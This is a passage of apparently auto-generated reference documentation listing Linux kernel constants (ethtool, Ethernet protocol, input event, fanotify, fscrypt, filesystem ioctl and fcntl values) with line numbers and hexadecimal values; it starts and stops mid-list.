ETHTOOL_NWAY_RST = 0x9 constant ETHTOOL_PERQUEUE (line 995) | ETHTOOL_PERQUEUE = 0x4b constant ETHTOOL_PHYS_ID (line 996) | ETHTOOL_PHYS_ID = 0x1c constant ETHTOOL_PHY_EDPD_DFLT_TX_MSECS (line 997) | ETHTOOL_PHY_EDPD_DFLT_TX_MSECS = 0xffff constant ETHTOOL_PHY_EDPD_DISABLE (line 998) | ETHTOOL_PHY_EDPD_DISABLE = 0x0 constant ETHTOOL_PHY_EDPD_NO_TX (line 999) | ETHTOOL_PHY_EDPD_NO_TX = 0xfffe constant ETHTOOL_PHY_FAST_LINK_DOWN_OFF (line 1000) | ETHTOOL_PHY_FAST_LINK_DOWN_OFF = 0xff constant ETHTOOL_PHY_FAST_LINK_DOWN_ON (line 1001) | ETHTOOL_PHY_FAST_LINK_DOWN_ON = 0x0 constant ETHTOOL_PHY_GTUNABLE (line 1002) | ETHTOOL_PHY_GTUNABLE = 0x4e constant ETHTOOL_PHY_STUNABLE (line 1003) | ETHTOOL_PHY_STUNABLE = 0x4f constant ETHTOOL_RESET (line 1004) | ETHTOOL_RESET = 0x34 constant ETHTOOL_RXNTUPLE_ACTION_CLEAR (line 1005) | ETHTOOL_RXNTUPLE_ACTION_CLEAR = -0x2 constant ETHTOOL_RXNTUPLE_ACTION_DROP (line 1006) | ETHTOOL_RXNTUPLE_ACTION_DROP = -0x1 constant ETHTOOL_RX_FLOW_SPEC_RING (line 1007) | ETHTOOL_RX_FLOW_SPEC_RING = 0xffffffff constant ETHTOOL_RX_FLOW_SPEC_RING_VF (line 1008) | ETHTOOL_RX_FLOW_SPEC_RING_VF = 0xff00000000 constant ETHTOOL_RX_FLOW_SPEC_RING_VF_OFF (line 1009) | ETHTOOL_RX_FLOW_SPEC_RING_VF_OFF = 0x20 constant ETHTOOL_SCHANNELS (line 1010) | ETHTOOL_SCHANNELS = 0x3d constant ETHTOOL_SCOALESCE (line 1011) | ETHTOOL_SCOALESCE = 0xf constant ETHTOOL_SEEE (line 1012) | ETHTOOL_SEEE = 0x45 constant ETHTOOL_SEEPROM (line 1013) | ETHTOOL_SEEPROM = 0xc constant ETHTOOL_SET_DUMP (line 1014) | ETHTOOL_SET_DUMP = 0x3e constant ETHTOOL_SFEATURES (line 1015) | ETHTOOL_SFEATURES = 0x3b constant ETHTOOL_SFECPARAM (line 1016) | ETHTOOL_SFECPARAM = 0x51 constant ETHTOOL_SFLAGS (line 1017) | ETHTOOL_SFLAGS = 0x26 constant ETHTOOL_SGRO (line 1018) | ETHTOOL_SGRO = 0x2c constant ETHTOOL_SGSO (line 1019) | ETHTOOL_SGSO = 0x24 constant ETHTOOL_SLINKSETTINGS (line 1020) | ETHTOOL_SLINKSETTINGS = 0x4d constant ETHTOOL_SMSGLVL (line 1021) | ETHTOOL_SMSGLVL = 0x8 constant ETHTOOL_SPAUSEPARAM (line 1022) | ETHTOOL_SPAUSEPARAM = 0x13 constant ETHTOOL_SPFLAGS (line 1023) | ETHTOOL_SPFLAGS = 0x28 constant ETHTOOL_SRINGPARAM (line 1024) | ETHTOOL_SRINGPARAM = 0x11 constant ETHTOOL_SRSSH (line 1025) | ETHTOOL_SRSSH = 0x47 constant ETHTOOL_SRXCLSRLDEL (line 1026) | ETHTOOL_SRXCLSRLDEL = 0x31 constant ETHTOOL_SRXCLSRLINS (line 1027) | ETHTOOL_SRXCLSRLINS = 0x32 constant ETHTOOL_SRXCSUM (line 1028) | ETHTOOL_SRXCSUM = 0x15 constant ETHTOOL_SRXFH (line 1029) | ETHTOOL_SRXFH = 0x2a constant ETHTOOL_SRXFHINDIR (line 1030) | ETHTOOL_SRXFHINDIR = 0x39 constant ETHTOOL_SRXNTUPLE (line 1031) | ETHTOOL_SRXNTUPLE = 0x35 constant ETHTOOL_SSET (line 1032) | ETHTOOL_SSET = 0x2 constant ETHTOOL_SSG (line 1033) | ETHTOOL_SSG = 0x19 constant ETHTOOL_STSO (line 1034) | ETHTOOL_STSO = 0x1f constant ETHTOOL_STUNABLE (line 1035) | ETHTOOL_STUNABLE = 0x49 constant ETHTOOL_STXCSUM (line 1036) | ETHTOOL_STXCSUM = 0x17 constant ETHTOOL_SUFO (line 1037) | ETHTOOL_SUFO = 0x22 constant ETHTOOL_SWOL (line 1038) | ETHTOOL_SWOL = 0x6 constant ETHTOOL_TEST (line 1039) | ETHTOOL_TEST = 0x1a constant ETH_P_1588 (line 1040) | ETH_P_1588 = 0x88f7 constant ETH_P_8021AD (line 1041) | ETH_P_8021AD = 0x88a8 constant ETH_P_8021AH (line 1042) | ETH_P_8021AH = 0x88e7 constant ETH_P_8021Q (line 1043) | ETH_P_8021Q = 0x8100 constant ETH_P_80221 (line 1044) | ETH_P_80221 = 0x8917 constant ETH_P_802_2 (line 1045) | ETH_P_802_2 = 0x4 constant ETH_P_802_3 (line 1046) | ETH_P_802_3 = 0x1 constant ETH_P_802_3_MIN (line 1047) | ETH_P_802_3_MIN = 0x600 constant ETH_P_802_EX1 (line 1048) | ETH_P_802_EX1 = 0x88b5 constant ETH_P_AARP (line 1049) | ETH_P_AARP = 0x80f3 constant ETH_P_AF_IUCV (line 1050) | ETH_P_AF_IUCV = 0xfbfb constant ETH_P_ALL (line 1051) | ETH_P_ALL = 0x3 constant ETH_P_AOE (line 1052) | ETH_P_AOE = 0x88a2 constant ETH_P_ARCNET (line 1053) | ETH_P_ARCNET = 0x1a constant ETH_P_ARP (line 1054) | ETH_P_ARP = 0x806 constant ETH_P_ATALK (line 1055) | ETH_P_ATALK = 0x809b constant ETH_P_ATMFATE (line 1056) | ETH_P_ATMFATE = 0x8884 constant ETH_P_ATMMPOA (line 1057) | ETH_P_ATMMPOA = 0x884c constant ETH_P_AX25 (line 1058) | ETH_P_AX25 = 0x2 constant ETH_P_BATMAN (line 1059) | ETH_P_BATMAN = 0x4305 constant ETH_P_BPQ (line 1060) | ETH_P_BPQ = 0x8ff constant ETH_P_CAIF (line 1061) | ETH_P_CAIF = 0xf7 constant ETH_P_CAN (line 1062) | ETH_P_CAN = 0xc constant ETH_P_CANFD (line 1063) | ETH_P_CANFD = 0xd constant ETH_P_CANXL (line 1064) | ETH_P_CANXL = 0xe constant ETH_P_CFM (line 1065) | ETH_P_CFM = 0x8902 constant ETH_P_CONTROL (line 1066) | ETH_P_CONTROL = 0x16 constant ETH_P_CUST (line 1067) | ETH_P_CUST = 0x6006 constant ETH_P_DDCMP (line 1068) | ETH_P_DDCMP = 0x6 constant ETH_P_DEC (line 1069) | ETH_P_DEC = 0x6000 constant ETH_P_DIAG (line 1070) | ETH_P_DIAG = 0x6005 constant ETH_P_DNA_DL (line 1071) | ETH_P_DNA_DL = 0x6001 constant ETH_P_DNA_RC (line 1072) | ETH_P_DNA_RC = 0x6002 constant ETH_P_DNA_RT (line 1073) | ETH_P_DNA_RT = 0x6003 constant ETH_P_DSA (line 1074) | ETH_P_DSA = 0x1b constant ETH_P_DSA_8021Q (line 1075) | ETH_P_DSA_8021Q = 0xdadb constant ETH_P_DSA_A5PSW (line 1076) | ETH_P_DSA_A5PSW = 0xe001 constant ETH_P_ECONET (line 1077) | ETH_P_ECONET = 0x18 constant ETH_P_EDSA (line 1078) | ETH_P_EDSA = 0xdada constant ETH_P_ERSPAN (line 1079) | ETH_P_ERSPAN = 0x88be constant ETH_P_ERSPAN2 (line 1080) | ETH_P_ERSPAN2 = 0x22eb constant ETH_P_ETHERCAT (line 1081) | ETH_P_ETHERCAT = 0x88a4 constant ETH_P_FCOE (line 1082) | ETH_P_FCOE = 0x8906 constant ETH_P_FIP (line 1083) | ETH_P_FIP = 0x8914 constant ETH_P_HDLC (line 1084) | ETH_P_HDLC = 0x19 constant ETH_P_HSR (line 1085) | ETH_P_HSR = 0x892f constant ETH_P_IBOE (line 1086) | ETH_P_IBOE = 0x8915 constant ETH_P_IEEE802154 (line 1087) | ETH_P_IEEE802154 = 0xf6 constant ETH_P_IEEEPUP (line 1088) | ETH_P_IEEEPUP = 0xa00 constant ETH_P_IEEEPUPAT (line 1089) | ETH_P_IEEEPUPAT = 0xa01 constant ETH_P_IFE (line 1090) | ETH_P_IFE = 0xed3e constant ETH_P_IP (line 1091) | ETH_P_IP = 0x800 constant ETH_P_IPV6 (line 1092) | ETH_P_IPV6 = 0x86dd constant ETH_P_IPX (line 1093) | ETH_P_IPX = 0x8137 constant ETH_P_IRDA (line 1094) | ETH_P_IRDA = 0x17 constant ETH_P_LAT (line 1095) | ETH_P_LAT = 0x6004 constant ETH_P_LINK_CTL (line 1096) | ETH_P_LINK_CTL = 0x886c constant ETH_P_LLDP (line 1097) | ETH_P_LLDP = 0x88cc constant ETH_P_LOCALTALK (line 1098) | ETH_P_LOCALTALK = 0x9 constant ETH_P_LOOP (line 1099) | ETH_P_LOOP = 0x60 constant ETH_P_LOOPBACK (line 1100) | ETH_P_LOOPBACK = 0x9000 constant ETH_P_MACSEC (line 1101) | ETH_P_MACSEC = 0x88e5 constant ETH_P_MAP (line 1102) | ETH_P_MAP = 0xf9 constant ETH_P_MCTP (line 1103) | ETH_P_MCTP = 0xfa constant ETH_P_MOBITEX (line 1104) | ETH_P_MOBITEX = 0x15 constant ETH_P_MPLS_MC (line 1105) | ETH_P_MPLS_MC = 0x8848 constant ETH_P_MPLS_UC (line 1106) | ETH_P_MPLS_UC = 0x8847 constant ETH_P_MRP (line 1107) | ETH_P_MRP = 0x88e3 constant ETH_P_MVRP (line 1108) | ETH_P_MVRP = 0x88f5 constant ETH_P_NCSI (line 1109) | ETH_P_NCSI = 0x88f8 constant ETH_P_NSH (line 1110) | ETH_P_NSH = 0x894f constant ETH_P_PAE (line 1111) | ETH_P_PAE = 0x888e constant ETH_P_PAUSE (line 1112) | ETH_P_PAUSE = 0x8808 constant ETH_P_PHONET (line 1113) | ETH_P_PHONET = 0xf5 constant ETH_P_PPPTALK (line 1114) | ETH_P_PPPTALK = 0x10 constant ETH_P_PPP_DISC (line 1115) | ETH_P_PPP_DISC = 0x8863 constant ETH_P_PPP_MP (line 1116) | ETH_P_PPP_MP = 0x8 constant ETH_P_PPP_SES (line 1117) | ETH_P_PPP_SES = 0x8864 constant ETH_P_PREAUTH (line 1118) | ETH_P_PREAUTH = 0x88c7 constant ETH_P_PROFINET (line 1119) | ETH_P_PROFINET = 0x8892 constant ETH_P_PRP (line 1120) | ETH_P_PRP = 0x88fb constant ETH_P_PUP (line 1121) | ETH_P_PUP = 0x200 constant ETH_P_PUPAT (line 1122) | ETH_P_PUPAT = 0x201 constant ETH_P_QINQ1 (line 1123) | ETH_P_QINQ1 = 0x9100 constant ETH_P_QINQ2 (line 1124) | ETH_P_QINQ2 = 0x9200 constant ETH_P_QINQ3 (line 1125) | ETH_P_QINQ3 = 0x9300 constant ETH_P_RARP (line 1126) | ETH_P_RARP = 0x8035 constant ETH_P_REALTEK (line 1127) | ETH_P_REALTEK = 0x8899 constant ETH_P_SCA (line 1128) | ETH_P_SCA = 0x6007 constant ETH_P_SLOW (line 1129) | ETH_P_SLOW = 0x8809 constant ETH_P_SNAP (line 1130) | ETH_P_SNAP = 0x5 constant ETH_P_TDLS (line 1131) | ETH_P_TDLS = 0x890d constant ETH_P_TEB (line 1132) | ETH_P_TEB = 0x6558 constant ETH_P_TIPC (line 1133) | ETH_P_TIPC = 0x88ca constant ETH_P_TRAILER (line 1134) | ETH_P_TRAILER = 0x1c constant ETH_P_TR_802_2 (line 1135) | ETH_P_TR_802_2 = 0x11 constant ETH_P_TSN (line 1136) | ETH_P_TSN = 0x22f0 constant ETH_P_WAN_PPP (line 1137) | ETH_P_WAN_PPP = 0x7 constant ETH_P_WCCP (line 1138) | ETH_P_WCCP = 0x883e constant ETH_P_X25 (line 1139) | ETH_P_X25 = 0x805 constant ETH_P_XDSA (line 1140) | ETH_P_XDSA = 0xf8 constant EV_ABS (line 1141) | EV_ABS = 0x3 constant EV_CNT (line 1142) | EV_CNT = 0x20 constant EV_FF (line 1143) | EV_FF = 0x15 constant EV_FF_STATUS (line 1144) | EV_FF_STATUS = 0x17 constant EV_KEY (line 1145) | EV_KEY = 0x1 constant EV_LED (line 1146) | EV_LED = 0x11 constant EV_MAX (line 1147) | EV_MAX = 0x1f constant EV_MSC (line 1148) | EV_MSC = 0x4 constant EV_PWR (line 1149) | EV_PWR = 0x16 constant EV_REL (line 1150) | EV_REL = 0x2 constant EV_REP (line 1151) | EV_REP = 0x14 constant EV_SND (line 1152) | EV_SND = 0x12 constant EV_SW (line 1153) | EV_SW = 0x5 constant EV_SYN (line 1154) | EV_SYN = 0x0 constant EV_VERSION (line 1155) | EV_VERSION = 0x10001 constant EXABYTE_ENABLE_NEST (line 1156) | EXABYTE_ENABLE_NEST = 0xf0 constant EXFAT_SUPER_MAGIC (line 1157) | EXFAT_SUPER_MAGIC = 0x2011bab0 constant EXT2_SUPER_MAGIC (line 1158) | EXT2_SUPER_MAGIC = 0xef53 constant EXT3_SUPER_MAGIC (line 1159) | EXT3_SUPER_MAGIC = 0xef53 constant EXT4_SUPER_MAGIC (line 1160) | EXT4_SUPER_MAGIC = 0xef53 constant EXTA (line 1161) | EXTA = 0xe constant EXTB (line 1162) | EXTB = 0xf constant F2FS_SUPER_MAGIC (line 1163) | F2FS_SUPER_MAGIC = 0xf2f52010 constant FALLOC_FL_COLLAPSE_RANGE (line 1164) | FALLOC_FL_COLLAPSE_RANGE = 0x8 constant FALLOC_FL_INSERT_RANGE (line 1165) | FALLOC_FL_INSERT_RANGE = 0x20 constant FALLOC_FL_KEEP_SIZE (line 1166) | FALLOC_FL_KEEP_SIZE = 0x1 constant FALLOC_FL_NO_HIDE_STALE (line 1167) | FALLOC_FL_NO_HIDE_STALE = 0x4 constant FALLOC_FL_PUNCH_HOLE (line 1168) | FALLOC_FL_PUNCH_HOLE = 0x2 constant FALLOC_FL_UNSHARE_RANGE (line 1169) | FALLOC_FL_UNSHARE_RANGE = 0x40 constant FALLOC_FL_ZERO_RANGE (line 1170) | FALLOC_FL_ZERO_RANGE = 0x10 constant FANOTIFY_METADATA_VERSION (line 1171) | FANOTIFY_METADATA_VERSION = 0x3 constant FAN_ACCESS (line 1172) | FAN_ACCESS = 0x1 constant FAN_ACCESS_PERM (line 1173) | FAN_ACCESS_PERM = 0x20000 constant FAN_ALLOW (line 1174) | FAN_ALLOW = 0x1 constant FAN_ALL_CLASS_BITS (line 1175) | FAN_ALL_CLASS_BITS = 0xc constant FAN_ALL_EVENTS (line 1176) | FAN_ALL_EVENTS = 0x3b constant FAN_ALL_INIT_FLAGS (line 1177) | FAN_ALL_INIT_FLAGS = 0x3f constant FAN_ALL_MARK_FLAGS (line 1178) | FAN_ALL_MARK_FLAGS = 0xff constant FAN_ALL_OUTGOING_EVENTS (line 1179) | FAN_ALL_OUTGOING_EVENTS = 0x3403b constant FAN_ALL_PERM_EVENTS (line 1180) | FAN_ALL_PERM_EVENTS = 0x30000 constant FAN_ATTRIB (line 1181) | FAN_ATTRIB = 0x4 constant FAN_AUDIT (line 1182) | FAN_AUDIT = 0x10 constant FAN_CLASS_CONTENT (line 1183) | FAN_CLASS_CONTENT = 0x4 constant FAN_CLASS_NOTIF (line 1184) | FAN_CLASS_NOTIF = 0x0 constant FAN_CLASS_PRE_CONTENT (line 1185) | FAN_CLASS_PRE_CONTENT = 0x8 constant FAN_CLOEXEC (line 1186) | FAN_CLOEXEC = 0x1 constant FAN_CLOSE (line 1187) | FAN_CLOSE = 0x18 constant FAN_CLOSE_NOWRITE (line 1188) | FAN_CLOSE_NOWRITE = 0x10 constant FAN_CLOSE_WRITE (line 1189) | FAN_CLOSE_WRITE = 0x8 constant FAN_CREATE (line 1190) | FAN_CREATE = 0x100 constant FAN_DELETE (line 1191) | FAN_DELETE = 0x200 constant FAN_DELETE_SELF (line 1192) | FAN_DELETE_SELF = 0x400 constant FAN_DENY (line 1193) | FAN_DENY = 0x2 constant FAN_ENABLE_AUDIT (line 1194) | FAN_ENABLE_AUDIT = 0x40 constant FAN_EPIDFD (line 1195) | FAN_EPIDFD = -0x2 constant FAN_EVENT_INFO_TYPE_DFID (line 1196) | FAN_EVENT_INFO_TYPE_DFID = 0x3 constant FAN_EVENT_INFO_TYPE_DFID_NAME (line 1197) | FAN_EVENT_INFO_TYPE_DFID_NAME = 0x2 constant FAN_EVENT_INFO_TYPE_ERROR (line 1198) | FAN_EVENT_INFO_TYPE_ERROR = 0x5 constant FAN_EVENT_INFO_TYPE_FID (line 1199) | FAN_EVENT_INFO_TYPE_FID = 0x1 constant FAN_EVENT_INFO_TYPE_NEW_DFID_NAME (line 1200) | FAN_EVENT_INFO_TYPE_NEW_DFID_NAME = 0xc constant FAN_EVENT_INFO_TYPE_OLD_DFID_NAME (line 1201) | FAN_EVENT_INFO_TYPE_OLD_DFID_NAME = 0xa constant FAN_EVENT_INFO_TYPE_PIDFD (line 1202) | FAN_EVENT_INFO_TYPE_PIDFD = 0x4 constant FAN_EVENT_METADATA_LEN (line 1203) | FAN_EVENT_METADATA_LEN = 0x18 constant FAN_EVENT_ON_CHILD (line 1204) | FAN_EVENT_ON_CHILD = 0x8000000 constant FAN_FS_ERROR (line 1205) | FAN_FS_ERROR = 0x8000 constant FAN_INFO (line 1206) | FAN_INFO = 0x20 constant FAN_MARK_ADD (line 1207) | FAN_MARK_ADD = 0x1 constant FAN_MARK_DONT_FOLLOW (line 1208) | FAN_MARK_DONT_FOLLOW = 0x4 constant FAN_MARK_EVICTABLE (line 1209) | FAN_MARK_EVICTABLE = 0x200 constant FAN_MARK_FILESYSTEM (line 1210) | FAN_MARK_FILESYSTEM = 0x100 constant FAN_MARK_FLUSH (line 1211) | FAN_MARK_FLUSH = 0x80 constant FAN_MARK_IGNORE (line 1212) | FAN_MARK_IGNORE = 0x400 constant FAN_MARK_IGNORED_MASK (line 1213) | FAN_MARK_IGNORED_MASK = 0x20 constant FAN_MARK_IGNORED_SURV_MODIFY (line 1214) | FAN_MARK_IGNORED_SURV_MODIFY = 0x40 constant FAN_MARK_IGNORE_SURV (line 1215) | FAN_MARK_IGNORE_SURV = 0x440 constant FAN_MARK_INODE (line 1216) | FAN_MARK_INODE = 0x0 constant FAN_MARK_MOUNT (line 1217) | FAN_MARK_MOUNT = 0x10 constant FAN_MARK_ONLYDIR (line 1218) | FAN_MARK_ONLYDIR = 0x8 constant FAN_MARK_REMOVE (line 1219) | FAN_MARK_REMOVE = 0x2 constant FAN_MODIFY (line 1220) | FAN_MODIFY = 0x2 constant FAN_MOVE (line 1221) | FAN_MOVE = 0xc0 constant FAN_MOVED_FROM (line 1222) | FAN_MOVED_FROM = 0x40 constant FAN_MOVED_TO (line 1223) | FAN_MOVED_TO = 0x80 constant FAN_MOVE_SELF (line 1224) | FAN_MOVE_SELF = 0x800 constant FAN_NOFD (line 1225) | FAN_NOFD = -0x1 constant FAN_NONBLOCK (line 1226) | FAN_NONBLOCK = 0x2 constant FAN_NOPIDFD (line 1227) | FAN_NOPIDFD = -0x1 constant FAN_ONDIR (line 1228) | FAN_ONDIR = 0x40000000 constant FAN_OPEN (line 1229) | FAN_OPEN = 0x20 constant FAN_OPEN_EXEC (line 1230) | FAN_OPEN_EXEC = 0x1000 constant FAN_OPEN_EXEC_PERM (line 1231) | FAN_OPEN_EXEC_PERM = 0x40000 constant FAN_OPEN_PERM (line 1232) | FAN_OPEN_PERM = 0x10000 constant FAN_Q_OVERFLOW (line 1233) | FAN_Q_OVERFLOW = 0x4000 constant FAN_RENAME (line 1234) | FAN_RENAME = 0x10000000 constant FAN_REPORT_DFID_NAME (line 1235) | FAN_REPORT_DFID_NAME = 0xc00 constant FAN_REPORT_DFID_NAME_TARGET (line 1236) | FAN_REPORT_DFID_NAME_TARGET = 0x1e00 constant FAN_REPORT_DIR_FID (line 1237) | FAN_REPORT_DIR_FID = 0x400 constant FAN_REPORT_FID (line 1238) | FAN_REPORT_FID = 0x200 constant FAN_REPORT_NAME (line 1239) | FAN_REPORT_NAME = 0x800 constant FAN_REPORT_PIDFD (line 1240) | FAN_REPORT_PIDFD = 0x80 constant FAN_REPORT_TARGET_FID (line 1241) | FAN_REPORT_TARGET_FID = 0x1000 constant FAN_REPORT_TID (line 1242) | FAN_REPORT_TID = 0x100 constant FAN_RESPONSE_INFO_AUDIT_RULE (line 1243) | FAN_RESPONSE_INFO_AUDIT_RULE = 0x1 constant FAN_RESPONSE_INFO_NONE (line 1244) | FAN_RESPONSE_INFO_NONE = 0x0 constant FAN_UNLIMITED_MARKS (line 1245) | FAN_UNLIMITED_MARKS = 0x20 constant FAN_UNLIMITED_QUEUE (line 1246) | FAN_UNLIMITED_QUEUE = 0x10 constant FD_CLOEXEC (line 1247) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 1248) | FD_SETSIZE = 0x400 constant FF0 (line 1249) | FF0 = 0x0 constant FIB_RULE_DEV_DETACHED (line 1250) | FIB_RULE_DEV_DETACHED = 0x8 constant FIB_RULE_FIND_SADDR (line 1251) | FIB_RULE_FIND_SADDR = 0x10000 constant FIB_RULE_IIF_DETACHED (line 1252) | FIB_RULE_IIF_DETACHED = 0x8 constant FIB_RULE_INVERT (line 1253) | FIB_RULE_INVERT = 0x2 constant FIB_RULE_OIF_DETACHED (line 1254) | FIB_RULE_OIF_DETACHED = 0x10 constant FIB_RULE_PERMANENT (line 1255) | FIB_RULE_PERMANENT = 0x1 constant FIB_RULE_UNRESOLVED (line 1256) | FIB_RULE_UNRESOLVED = 0x4 constant FIDEDUPERANGE (line 1257) | FIDEDUPERANGE = 0xc0189436 constant FSCRYPT_KEY_DESCRIPTOR_SIZE (line 1258) | FSCRYPT_KEY_DESCRIPTOR_SIZE = 0x8 constant FSCRYPT_KEY_DESC_PREFIX (line 1259) | FSCRYPT_KEY_DESC_PREFIX = "fscrypt:" constant FSCRYPT_KEY_DESC_PREFIX_SIZE (line 1260) | FSCRYPT_KEY_DESC_PREFIX_SIZE = 0x8 constant FSCRYPT_KEY_IDENTIFIER_SIZE (line 1261) | FSCRYPT_KEY_IDENTIFIER_SIZE = 0x10 constant FSCRYPT_KEY_REMOVAL_STATUS_FLAG_FILES_BUSY (line 1262) | FSCRYPT_KEY_REMOVAL_STATUS_FLAG_FILES_BUSY = 0x1 constant FSCRYPT_KEY_REMOVAL_STATUS_FLAG_OTHER_USERS (line 1263) | FSCRYPT_KEY_REMOVAL_STATUS_FLAG_OTHER_USERS = 0x2 constant FSCRYPT_KEY_SPEC_TYPE_DESCRIPTOR (line 1264) | FSCRYPT_KEY_SPEC_TYPE_DESCRIPTOR = 0x1 constant FSCRYPT_KEY_SPEC_TYPE_IDENTIFIER (line 1265) | FSCRYPT_KEY_SPEC_TYPE_IDENTIFIER = 0x2 constant FSCRYPT_KEY_STATUS_ABSENT (line 1266) | FSCRYPT_KEY_STATUS_ABSENT = 0x1 constant FSCRYPT_KEY_STATUS_FLAG_ADDED_BY_SELF (line 1267) | FSCRYPT_KEY_STATUS_FLAG_ADDED_BY_SELF = 0x1 constant FSCRYPT_KEY_STATUS_INCOMPLETELY_REMOVED (line 1268) | FSCRYPT_KEY_STATUS_INCOMPLETELY_REMOVED = 0x3 constant FSCRYPT_KEY_STATUS_PRESENT (line 1269) | FSCRYPT_KEY_STATUS_PRESENT = 0x2 constant FSCRYPT_MAX_KEY_SIZE (line 1270) | FSCRYPT_MAX_KEY_SIZE = 0x40 constant FSCRYPT_MODE_ADIANTUM (line 1271) | FSCRYPT_MODE_ADIANTUM = 0x9 constant FSCRYPT_MODE_AES_128_CBC (line 1272) | FSCRYPT_MODE_AES_128_CBC = 0x5 constant FSCRYPT_MODE_AES_128_CTS (line 1273) | FSCRYPT_MODE_AES_128_CTS = 0x6 constant FSCRYPT_MODE_AES_256_CTS (line 1274) | FSCRYPT_MODE_AES_256_CTS = 0x4 constant FSCRYPT_MODE_AES_256_HCTR2 (line 1275) | FSCRYPT_MODE_AES_256_HCTR2 = 0xa constant FSCRYPT_MODE_AES_256_XTS (line 1276) | FSCRYPT_MODE_AES_256_XTS = 0x1 constant FSCRYPT_MODE_SM4_CTS (line 1277) | FSCRYPT_MODE_SM4_CTS = 0x8 constant FSCRYPT_MODE_SM4_XTS (line 1278) | FSCRYPT_MODE_SM4_XTS = 0x7 constant FSCRYPT_POLICY_FLAGS_PAD_16 (line 1279) | FSCRYPT_POLICY_FLAGS_PAD_16 = 0x2 constant FSCRYPT_POLICY_FLAGS_PAD_32 (line 1280) | FSCRYPT_POLICY_FLAGS_PAD_32 = 0x3 constant FSCRYPT_POLICY_FLAGS_PAD_4 (line 1281) | FSCRYPT_POLICY_FLAGS_PAD_4 = 0x0 constant FSCRYPT_POLICY_FLAGS_PAD_8 (line 1282) | FSCRYPT_POLICY_FLAGS_PAD_8 = 0x1 constant FSCRYPT_POLICY_FLAGS_PAD_MASK (line 1283) | FSCRYPT_POLICY_FLAGS_PAD_MASK = 0x3 constant FSCRYPT_POLICY_FLAG_DIRECT_KEY (line 1284) | FSCRYPT_POLICY_FLAG_DIRECT_KEY = 0x4 constant FSCRYPT_POLICY_FLAG_IV_INO_LBLK_32 (line 1285) | FSCRYPT_POLICY_FLAG_IV_INO_LBLK_32 = 0x10 constant FSCRYPT_POLICY_FLAG_IV_INO_LBLK_64 (line 1286) | FSCRYPT_POLICY_FLAG_IV_INO_LBLK_64 = 0x8 constant FSCRYPT_POLICY_V1 (line 1287) | FSCRYPT_POLICY_V1 = 0x0 constant FSCRYPT_POLICY_V2 (line 1288) | FSCRYPT_POLICY_V2 = 0x2 constant FS_ENCRYPTION_MODE_ADIANTUM (line 1289) | FS_ENCRYPTION_MODE_ADIANTUM = 0x9 constant FS_ENCRYPTION_MODE_AES_128_CBC (line 1290) | FS_ENCRYPTION_MODE_AES_128_CBC = 0x5 constant FS_ENCRYPTION_MODE_AES_128_CTS (line 1291) | FS_ENCRYPTION_MODE_AES_128_CTS = 0x6 constant FS_ENCRYPTION_MODE_AES_256_CBC (line 1292) | FS_ENCRYPTION_MODE_AES_256_CBC = 0x3 constant FS_ENCRYPTION_MODE_AES_256_CTS (line 1293) | FS_ENCRYPTION_MODE_AES_256_CTS = 0x4 constant FS_ENCRYPTION_MODE_AES_256_GCM (line 1294) | FS_ENCRYPTION_MODE_AES_256_GCM = 0x2 constant FS_ENCRYPTION_MODE_AES_256_XTS (line 1295) | FS_ENCRYPTION_MODE_AES_256_XTS = 0x1 constant FS_ENCRYPTION_MODE_INVALID (line 1296) | FS_ENCRYPTION_MODE_INVALID = 0x0 constant FS_IOC_ADD_ENCRYPTION_KEY (line 1297) | FS_IOC_ADD_ENCRYPTION_KEY = 0xc0506617 constant FS_IOC_GET_ENCRYPTION_KEY_STATUS (line 1298) | FS_IOC_GET_ENCRYPTION_KEY_STATUS = 0xc080661a constant FS_IOC_GET_ENCRYPTION_POLICY_EX (line 1299) | FS_IOC_GET_ENCRYPTION_POLICY_EX = 0xc0096616 constant FS_IOC_MEASURE_VERITY (line 1300) | FS_IOC_MEASURE_VERITY = 0xc0046686 constant FS_IOC_READ_VERITY_METADATA (line 1301) | FS_IOC_READ_VERITY_METADATA = 0xc0286687 constant FS_IOC_REMOVE_ENCRYPTION_KEY (line 1302) | FS_IOC_REMOVE_ENCRYPTION_KEY = 0xc0406618 constant FS_IOC_REMOVE_ENCRYPTION_KEY_ALL_USERS (line 1303) | FS_IOC_REMOVE_ENCRYPTION_KEY_ALL_USERS = 0xc0406619 constant FS_KEY_DESCRIPTOR_SIZE (line 1304) | FS_KEY_DESCRIPTOR_SIZE = 0x8 constant FS_KEY_DESC_PREFIX (line 1305) | FS_KEY_DESC_PREFIX = "fscrypt:" constant FS_KEY_DESC_PREFIX_SIZE (line 1306) | FS_KEY_DESC_PREFIX_SIZE = 0x8 constant FS_MAX_KEY_SIZE (line 1307) | FS_MAX_KEY_SIZE = 0x40 constant FS_POLICY_FLAGS_PAD_16 (line 1308) | FS_POLICY_FLAGS_PAD_16 = 0x2 constant FS_POLICY_FLAGS_PAD_32 (line 1309) | FS_POLICY_FLAGS_PAD_32 = 0x3 constant FS_POLICY_FLAGS_PAD_4 (line 1310) | FS_POLICY_FLAGS_PAD_4 = 0x0 constant FS_POLICY_FLAGS_PAD_8 (line 1311) | FS_POLICY_FLAGS_PAD_8 = 0x1 constant FS_POLICY_FLAGS_PAD_MASK (line 1312) | FS_POLICY_FLAGS_PAD_MASK = 0x3 constant FS_POLICY_FLAGS_VALID (line 1313) | FS_POLICY_FLAGS_VALID = 0x7 constant FS_VERITY_FL (line 1314) | FS_VERITY_FL = 0x100000 constant FS_VERITY_HASH_ALG_SHA256 (line 1315) | FS_VERITY_HASH_ALG_SHA256 = 0x1 constant FS_VERITY_HASH_ALG_SHA512 (line 1316) | FS_VERITY_HASH_ALG_SHA512 = 0x2 constant FS_VERITY_METADATA_TYPE_DESCRIPTOR (line 1317) | FS_VERITY_METADATA_TYPE_DESCRIPTOR = 0x2 constant FS_VERITY_METADATA_TYPE_MERKLE_TREE (line 1318) | FS_VERITY_METADATA_TYPE_MERKLE_TREE = 0x1 constant FS_VERITY_METADATA_TYPE_SIGNATURE (line 1319) | FS_VERITY_METADATA_TYPE_SIGNATURE = 0x3 constant FUSE_SUPER_MAGIC (line 1320) | FUSE_SUPER_MAGIC = 0x65735546 constant FUTEXFS_SUPER_MAGIC (line 1321) | FUTEXFS_SUPER_MAGIC = 0xbad1dea constant F_ADD_SEALS (line 1322) | F_ADD_SEALS = 0x409 constant F_DUPFD (line 1323) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 1324) | F_DUPFD_CLOEXEC = 0x406 constant F_EXLCK (line 1325) | F_EXLCK = 0x4 constant F_GETFD (line 1326) | F_GETFD = 0x1 constant F_GETFL 